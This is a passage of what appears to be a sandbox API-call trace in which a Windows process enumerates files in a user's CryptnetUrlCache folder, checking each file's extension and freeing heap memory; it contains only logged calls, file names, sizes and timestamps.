ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cAlternateFileName="809279~1")) returned 1 [0237.096] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0237.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.096] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58394060, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58394060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f739c0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cAlternateFileName="8059E9~1")) returned 1 [0237.096] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0237.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.096] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x62378a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x62378a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9a9c80, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cAlternateFileName="80E4BE~1")) returned 1 [0237.097] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0237.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.097] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x613675c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x613675c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69bba4a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cAlternateFileName="803B9E~1")) returned 1 [0237.097] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0237.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.097] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x63c50fe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63c50fe0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb100bf40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cAlternateFileName="803D37~1")) returned 1 [0237.097] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0237.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.097] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61021780, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61021780, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb1058200, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cAlternateFileName="8059E9~4")) returned 1 [0237.097] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0237.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.097] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x636a9ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x636a9ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb139e040, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cAlternateFileName="800D31~1")) returned 1 [0237.097] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0237.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.097] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x581f7ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x581f7ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f4d860, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x56e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cAlternateFileName="828298~1")) returned 1 [0237.097] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0237.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.097] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xec3c5340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec3c5340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xb16257a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cAlternateFileName="8828F3~1")) returned 1 [0237.097] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0237.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.097] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8064ac00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x8064ac00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80670d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cAlternateFileName="8828F3~2")) returned 1 [0237.098] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0237.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.098] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6aa2c0a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6aa2c0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xadf19ae0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cAlternateFileName="8E4E51~1")) returned 1 [0237.098] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0237.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.098] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbddd270, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0xd2da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0237.098] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned="" [0237.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.098] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6a83cec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a83cec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaebe5120, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x5e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cAlternateFileName="955CAB~1")) returned 1 [0237.098] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0237.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.098] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf3f73d0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf3f73d0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf3f73d0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cAlternateFileName="9BC2FF~1")) returned 1 [0237.099] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0237.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.099] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe06277d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe06277d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xb15d94e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cAlternateFileName="9C888B~1")) returned 1 [0237.099] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0237.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.099] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe07ca6f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe07ca6f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0x965accc0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cAlternateFileName="9C888B~2")) returned 1 [0237.099] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0237.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.099] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54bc3730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54bc3730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb11d4fc0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cAlternateFileName="A9E4F7~1")) returned 1 [0237.099] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0237.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.099] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bfe570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bfe570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe9b34f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cAlternateFileName="ACF244~1")) returned 1 [0237.099] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0237.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.099] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe04aaa10, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe04aaa10, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xae4e7080, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cAlternateFileName="B3BB9C~2")) returned 1 [0237.099] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0237.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.099] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefc01b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefc01b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa4ee1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cAlternateFileName="B3BB9C~1")) returned 1 [0237.099] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0237.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.099] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54322770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54322770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cAlternateFileName="BC570E~2")) returned 1 [0237.100] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0237.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.100] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cAlternateFileName="BC570E~1")) returned 1 [0237.100] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0237.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.100] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56bb3b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x56bb3b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaeca3800, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cAlternateFileName="C46E7B~2")) returned 1 [0237.100] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0237.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.100] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x682fbd00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x682fbd00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae0bca00, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cAlternateFileName="C46E7B~3")) returned 1 [0237.100] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0237.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.100] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5461c2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5461c2f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf67eb30, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0237.100] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0237.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.100] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x728c68a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x728c68a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xae63dce0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x5ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cAlternateFileName="D47DBD~2")) returned 1 [0237.100] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0237.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.100] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x545f6190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x545f6190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69b6e1e0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x5ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cAlternateFileName="D47DBD~1")) returned 1 [0237.100] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0237.100] HeapFree (in: 